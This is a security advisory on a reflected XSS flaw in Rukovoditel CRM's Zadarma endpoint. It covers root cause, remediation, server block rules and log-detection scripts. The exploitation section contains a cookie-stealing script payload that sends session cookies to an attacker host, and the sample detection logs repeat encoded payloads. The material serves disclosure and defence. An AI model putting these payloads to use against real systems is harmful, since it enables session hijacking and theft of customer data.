CVE-2026-31845: Rukovoditel CRM Reflected XSS in Zadarma API (CVSS 9.3)

Critical Security Alert

This vulnerability is actively being exploited. Immediate action is recommended.


Rukovoditel CRM versions 3.6.4 and earlier contain a critical reflected XSS vulnerability in the Zadarma telephony API endpoint. The application reflects unsanitized user input from the zd_echo GET parameter directly into HTTP responses, enabling session hijacking and account takeover.

Dylan H.

Security Team

April 11, 2026
6 min read

Affected Products

  • Rukovoditel CRM <= 3.6.4

CVE-2026-31845: Rukovoditel CRM Reflected XSS in Zadarma Telephony API

A critical reflected cross-site scripting (XSS) vulnerability has been disclosed in Rukovoditel CRM, tracked as CVE-2026-31845 with a CVSS v3.1 score of 9.3 (Critical). The vulnerability exists in the Zadarma telephony API endpoint (/api/tel/zadarma.php) in all versions up to and including 3.6.4. The application directly reflects unsanitized input from the zd_echo GET parameter into the HTTP response, enabling script injection attacks.


Vulnerability Overview

Attribute                Value
CVE ID                   CVE-2026-31845
CVSS Score               9.3 (Critical)
CWE Classification       CWE-79 — Improper Neutralization of Input During Web Page Generation (Reflected XSS)
Affected Software        Rukovoditel CRM
Affected Versions        3.6.4 and earlier
Vulnerable Endpoint      /api/tel/zadarma.php
Vulnerable Parameter     zd_echo (GET)
Authentication Required  No — unauthenticated endpoint
Published                April 11, 2026

Technical Analysis

Vulnerability Root Cause

The /api/tel/zadarma.php endpoint is part of Rukovoditel's integration with the Zadarma VoIP telephony service. It is designed to handle webhooks and callback data from Zadarma's API. The endpoint reads the zd_echo GET parameter and directly echoes its value into the HTTP response body without any encoding or sanitization:

<?php
// /api/tel/zadarma.php
// Simplified vulnerable pattern (conceptual representation, not the project's exact source)
$echo_value = $_GET['zd_echo'];
// No htmlspecialchars(), no strip_tags(), no input validation
echo $echo_value;
?>

Because PHP serves the response with a Content-Type: text/html header by default (or the browser infers HTML rendering), any HTML/JavaScript payload in zd_echo is parsed as markup and executed by the victim's browser.

Exploitation

An attacker constructs a URL that targets an authenticated Rukovoditel CRM user:

https://target-crm.example.com/api/tel/zadarma.php?zd_echo=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>

Attack flow:

  1. Attacker crafts a malicious URL containing a JavaScript payload in the zd_echo parameter
  2. Attacker delivers the URL to a CRM user via phishing email, internal message, or social engineering
  3. Victim clicks the link while authenticated to the Rukovoditel CRM
  4. The browser sends the GET request to /api/tel/zadarma.php
  5. The server reflects the payload in the HTML response without sanitization
  6. The victim's browser executes the injected script in the context of the CRM origin
  7. Attacker can exfiltrate session cookies, perform actions on behalf of the user, or redirect to a credential-harvesting page

Why CVSS 9.3 for a Reflected XSS?

Reflected XSS typically scores lower; the Critical score here reflects the following factors:

  • Unauthenticated endpoint — no credentials required to trigger the reflection
  • Scope: Changed — successful exploitation affects resources (user sessions, CRM data) beyond the vulnerable endpoint itself
  • Confidentiality/Integrity impact: High — an attacker can exfiltrate all CRM data accessible to the victim and perform any CRM action as the victim
  • Attack Complexity: Low — trivial to craft and deliver a malicious URL
  • No privileges required — attacker requires no account on the target system

Scope of Impact

Rukovoditel CRM is an open-source customer relationship management system widely deployed for project management, customer tracking, and task automation. Organizations using the Zadarma telephony integration are particularly exposed since the vulnerable endpoint is part of that integration.

Potential attack targets include:

  • CRM administrators — full system takeover if an admin account is hijacked
  • Sales and support staff — exfiltration of customer PII, deal records, contact details
  • Automated webhook processors — if the CRM processes the Zadarma webhook via a service account, scheduled processing of a malicious echo value could trigger stored effects

Remediation

Primary Fix: Update Rukovoditel CRM

Update to a patched version of Rukovoditel immediately. Check the official GitHub repository for a patched release:

# Check installed version
cat /path/to/rukovoditel/config/version.php
 
# Update via Git if installed from source
cd /path/to/rukovoditel
git fetch origin
git checkout <patched-tag>

Interim Mitigations

If an immediate update is not possible:

  1. Block access to the vulnerable endpoint at the web server layer. The Nginx rule uses an exact-match location so that a generic "location ~ \.php$" handler cannot take precedence over the deny rule:
# Nginx — block /api/tel/zadarma.php from external access
location = /api/tel/zadarma.php {
    allow 127.0.0.1;
    # Add trusted Zadarma webhook IP ranges if known
    deny all;
}
# Apache — restrict access (Apache 2.2 / mod_access_compat syntax;
# on Apache 2.4 use "Require ip 127.0.0.1" from mod_authz_core instead)
<Location "/api/tel/zadarma.php">
    Order deny,allow
    Deny from all
    Allow from 127.0.0.1
</Location>
  2. Deploy a Web Application Firewall (WAF) with XSS detection rules to intercept reflected script payloads at the perimeter.

  3. Disable the Zadarma integration in the CRM settings if telephony integration is not in use.

  4. Audit CRM access logs for requests to /api/tel/zadarma.php containing HTML or JavaScript characters (<, >, script, javascript:), including their URL-encoded forms (%3C, %3E).


Detection

Identify potential exploitation attempts in web access logs:

# Search access logs for suspicious zd_echo payloads
# Browsers URL-encode the query string, so match both literal and %-encoded forms
grep "zadarma.php" /var/log/nginx/access.log | grep -iE "(<script|%3Cscript|javascript:|javascript%3A|onerror|onload|alert\(|alert%28|document\.cookie)"
 
# Monitor for base64-encoded XSS payloads (common evasion technique)
grep "zadarma.php" /var/log/nginx/access.log | grep -iE "(base64|eval\(|eval%28|atob\(|atob%28)"
 
# Count requests to the endpoint per client IP to identify scanning activity
awk '/zadarma\.php/ {print $1}' /var/log/nginx/access.log | sort | uniq -c | sort -rn | head -20
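The greps above run on the raw log line, so a payload that is double URL-encoded (%253Cscript) slips past them. The following script is added here as an example and is not part of the original advisory or of Rukovoditel: it parses Nginx combined-format lines, isolates the zd_echo value, decodes it until it stops changing, and applies the same indicators to the decoded text. The log lines, client IPs and the attacker.example hostname in it are constructed sample data.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed nginx "combined" access-log lines for this example (not real traffic);
# client IPs are documentation ranges and attacker.example is a placeholder.
SAMPLE_LOG = r"""
10.0.0.5 - - [11/Apr/2026:10:01:02 +0000] "GET /api/tel/zadarma.php?zd_echo=ping HTTP/1.1" 200 4 "-" "Zadarma-Webhook"
203.0.113.7 - - [11/Apr/2026:10:02:15 +0000] "GET /api/tel/zadarma.php?zd_echo=%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fattacker.example%2Fsteal%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 97 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Apr/2026:10:02:16 +0000] "GET /api/tel/zadarma.php?zd_echo=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 60 "-" "Mozilla/5.0"
198.51.100.9 - - [11/Apr/2026:10:03:40 +0000] "GET /index.php?module=dashboard HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
""".strip().splitlines()

# Client IP, timestamp and request target (path + query) from a combined-format line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) [^"]*"')

# The same indicators the grep commands look for, applied to the decoded parameter value.
INDICATORS = re.compile(r"<\s*script|javascript:|on(?:error|load)\s*=|alert\s*\(|document\.cookie", re.I)


def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded payloads are unmasked."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_line(line):
    """Return a finding for a zadarma.php request whose zd_echo looks like XSS, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    if not target.path.endswith("/api/tel/zadarma.php"):
        return None
    # parse_qs performs one round of decoding; decode_fully handles any further layers.
    raw = parse_qs(target.query, keep_blank_values=True).get("zd_echo", [""])[0]
    payload = decode_fully(raw)
    hit = INDICATORS.search(payload)
    if not hit:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"),
            "indicator": hit.group(0), "payload": payload[:80]}


def scan(lines):
    """Findings for every matching line; group on the ip field to spot scanning activity."""
    return [f for f in (inspect_line(line) for line in lines) if f]
```

Feed it real lines with scan(open("/var/log/nginx/access.log")) and aggregate the ip field to reproduce the per-client count from the awk pipeline.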

Impact Assessment

Impact Area             Description
Session Hijacking       Session cookies stolen if HttpOnly is not set
Account Takeover        Attacker can perform all CRM actions as the victim
Data Exfiltration       Customer PII, deal data, contact records accessible via victim's session
Phishing Amplification  Malicious links appear to originate from the CRM domain, increasing trust
Stored Payload Risk     If the reflection is cached or logged by intermediate systems, secondary victims may be affected

Key Takeaways

  1. CVE-2026-31845 is a CVSS 9.3 Critical reflected XSS in Rukovoditel CRM (≤ 3.6.4) via the /api/tel/zadarma.php endpoint
  2. The zd_echo GET parameter is echoed into the HTML response without any sanitization or encoding
  3. No authentication is required — the endpoint is publicly accessible
  4. Patch immediately by updating to a fixed version; restrict the endpoint at the web server layer as an interim measure
  5. Deploy a WAF with XSS rules and audit access logs for exploitation indicators
  6. The high CVSS score reflects the combination of no-auth access, changed scope, and high impact on CRM data confidentiality and integrity

Sources

  • CVE-2026-31845 — NIST NVD